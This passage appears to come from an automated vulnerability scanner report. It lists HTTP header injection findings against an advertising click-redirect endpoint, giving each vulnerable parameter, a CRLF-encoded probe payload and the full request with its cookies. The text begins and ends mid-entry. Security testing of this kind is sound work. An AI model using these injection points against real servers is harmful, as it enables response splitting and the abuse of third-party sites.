GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r;a=de792%0d%0adb8b6b2f830&vehicle=altima&dcp=zmm.57350078.&dcc=40424790.233402132 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The value of the dcc request parameter is copied into the Location response header. The payload b2393%0d%0a04e19a6bbd5 was submitted in the dcc parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=altima&dcp=zmm.57350078.&dcc=b2393%0d%0a04e19a6bbd5 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The value of the dcp request parameter is copied into the Location response header. The payload 5c9bc%0d%0ab7d0a7d3b63 was submitted in the dcp parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=altima&dcp=5c9bc%0d%0ab7d0a7d3b63&dcc=40424790.233402132 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
3.114. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 3e6ac%0d%0a9377000351 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r?3e6ac%0d%0a9377000351=1 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
The value of the vehicle request parameter is copied into the Location response header. The payload b3f74%0d%0a884d93094bb was submitted in the vehicle parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=b3f74%0d%0a884d93094bb&dcp=zmm.57350078.&dcc=40424790.233402132 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=ahngURm5abw6yuoZbUfT4fqUDUD2sYQZdDZaWW5gcyxDyPZavxFaFVwPjCxqed38T6fqg6FLfVUSwNqICgoRmBXnHiAq9ZcS0BZaVihw22E0xs1PodZbnMcta9SY0g8MClDKjZcsMHytYQ4dxK0ZbIabI7D37Za1xZaS8gafiZacV6DntAj3ZbHHbmmnB4K6nnAI53IZaj44LMerpZdtZaATdejJZbrFZcxbCdqLPaqpPnUSUOvusZckYNaUlZbAZd13LYq0XNkZaALQPuyuqyE9Qnf0dsrmIUmZcnAWwyKCv0CYL8Zb010VvSPKDuH8ruSHXCovdK5pZbKPbbZckIOHeUQiPuO1SgcPN8vQ6wZb9B0jBswZcaaDUhSTwoguVXFgVcERQ6i1uVhI8EZdDbWxKBJKZaCZdQZaBNfFXDIpWfCp8bvsDO8rsnsKj1OF58C3ZbrQj0TKDY2ReHZc0u36I5jeCTtCSL3C0dLlwpvNq4dnuG;
3.116. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 26972%0d%0a53a2f8f14bb was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/?26972%0d%0a53a2f8f14bb=1 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the ord request parameter is copied into the Location response header. The payload 289df%0d%0af5f35e76bbb was submitted in the ord parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/;ord=289df%0d%0af5f35e76bbb HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 3 is copied into the Location response header. The payload c44f8%0d%0a5a08a3ec162 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/c44f8%0d%0a5a08a3ec162/pixel.quantserve.com/r HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 4 is copied into the Location response header. The payload e3bb1%0d%0a8e9ee6e06df was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/e3bb1%0d%0a8e9ee6e06df/r HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 5 is copied into the Location response header. The payload 558f5%0d%0a3e39ab254d8 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/558f5%0d%0a3e39ab254d8 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the a request parameter is copied into the Location response header. The payload dca0d%0d%0a172d6a83c62 was submitted in the a parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r;a=dca0d%0d%0a172d6a83c62&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the dcc request parameter is copied into the Location response header. The payload 3a2f2%0d%0a19a38b62d09 was submitted in the dcc parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=versa-hatchback&dcp=zmm.50658498.&dcc=3a2f2%0d%0a19a38b62d09 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the dcp request parameter is copied into the Location response header. The payload e956a%0d%0a58d4acea581 was submitted in the dcp parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=versa-hatchback&dcp=e956a%0d%0a58d4acea581&dcc=39942763.226884546 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
3.124. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload d90e5%0d%0a5824a831334 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r?d90e5%0d%0a5824a831334=1 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the vehicle request parameter is copied into the Location response header. The payload 2947d%0d%0a05ef6ceb7f1 was submitted in the vehicle parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r;a=p-5aa_ooycXTWzY;labels=_click.adserver.doubleclick*http://local.nissanusa.com/zip.aspx?regionalZipCode=null&vehicle=2947d%0d%0a05ef6ceb7f1&dcp=zmm.50658498.&dcc=39942763.226884546 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the c request parameter is copied into the Location response header. The payload 3690c%0d%0a1a9836ae15c was submitted in the c parameter. This caused a response containing an injected HTTP header.
Request
